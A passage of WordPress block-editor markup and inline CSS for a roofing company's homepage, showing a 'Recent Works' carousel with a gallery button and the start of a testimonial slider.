padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-994f6e51-2a17-435a-8b2f-9235a8bb8702 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"2ac6f6b9-bced-48f5-9f60-eae03e300214\"} -->\n<style type=\"text/css\"> .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2ac6f6b9-bced-48f5-9f60-eae03e300214\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"47168312-0ca1-4133-bab7-40d5c2e35f72\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\"} -->\n<style type=\"text/css\"> .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"f3bc0552-a5a5-4575-aa4d-c19791bc625e\"} -->\n<style type=\"text/css\"> .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4ef232e7-4452-4f40-9949-fe0d82ccff32\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-4ef232e7-4452-4f40-9949-fe0d82ccff32 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7fb2dcec-224f-4765-8762-daef2cd5aa1c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7fb2dcec-224f-4765-8762-daef2cd5aa1c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 